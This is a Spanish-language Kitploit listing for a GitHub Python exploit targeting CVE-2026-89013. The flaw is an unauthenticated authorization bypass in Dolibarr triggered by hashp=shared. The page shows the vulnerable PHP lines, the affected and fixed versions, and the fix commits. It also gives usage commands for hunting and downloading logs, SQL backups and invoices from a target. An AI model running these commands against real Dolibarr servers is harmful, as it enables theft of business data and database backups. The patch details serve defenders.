Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-89013 — Exploit en Python para CVE-2026-89013, un bypass de autorización no autenticado en Dolibarr hashp que permite la lectura arbitraria de archivos, con modos check, list, hunt, read y download. | Kitploit
Herramientas/GitHubGitHub/faceless0x7/cve-2026-89013
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAutenticación
GitHubfaceless0x7/cve-2026-89013

CVE-2026-89013

Exploit en Python para CVE-2026-89013, un bypass de autorización no autenticado en Dolibarr hashp que permite la lectura arbitraria de archivos, con modos check, list, hunt, read y download.

1hace 16h 9mAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-89013 — Omisión de autorización en Dolibarr con hashp=shared

Exploit para CVE-2026-89013: document.php y viewimage.php fuerzan NOLOGIN cuando el parámetro hashp está presente. El valor de marcador interno shared omite la resolución del token de compartición, pero la anulación del control de acceso sigue activándose para cualquier valor no vacío y establece $accessallowed = 1, descartando el resultado de dol_check_secure_access_document(). Por lo tanto, una petición no autenticada puede leer cualquier archivo en todos los árboles de modulepart: documentos de negocio, registros de administración, copias de seguridad SQL (modulepart=systemtools), fuentes de módulos personalizados (modulepart=packages), y otras entidades multicompañía mediante .

&entity=N

Registro: https://www.cve.org/CVERecord?id=CVE-2026-89013

AfectadoDolibarr 23.0.4 – 24.0.0
Corregido24.0.1
Requisitos previosninguno (no autenticado)
Impactolectura arbitraria de archivos dentro de los directorios gestionados de Dolibarr

Causa raíz

root@kitploit:~
// htdocs/document.php:189 (24.0.0) — 'shared' skips token resolution
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }

// htdocs/document.php:292 — but any hashp forces access
if (!empty($hashp)) {
    $accessallowed = 1;
    $sqlprotectagainstexternals = '';
}

Una regresión del commit 5028dae981e (2026-08-12), distribuida por primera vez en 23.0.4 y 24.0.0. El traversal (../) se sanea en el lado del servidor — esto es una omisión de autorización, no un path traversal.

Uso

root@kitploit:~
# detection (safe, nonexistent canary file)
python3 CVE-2026-89013.py https://erp.local check

# readable modulepart trees
python3 CVE-2026-89013.py https://erp.local list

# hunt: dolibarr.log + SQL backups (generated filenames) + user vcards
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save

# read / download
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2

# PDFs via viewimage.php
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf

Solo biblioteca estándar (Python 3.8+). Compatible con --proxy, --insecure, --timeout.

demo

Referencias

  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-89013
  • Versión corregida: https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • Commits de corrección:
    • https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    • https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    • https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
  • Origen de la regresión: https://github.com/Dolibarr/dolibarr/commit/5028dae981e47dfab349f8fe2ef79b54ae95d1b6

Descargo de responsabilidad

Solo para pruebas e investigación autorizadas. Úsalo únicamente contra sistemas que poseas o para los que tengas permiso explícito de probar.

Descargar herramienta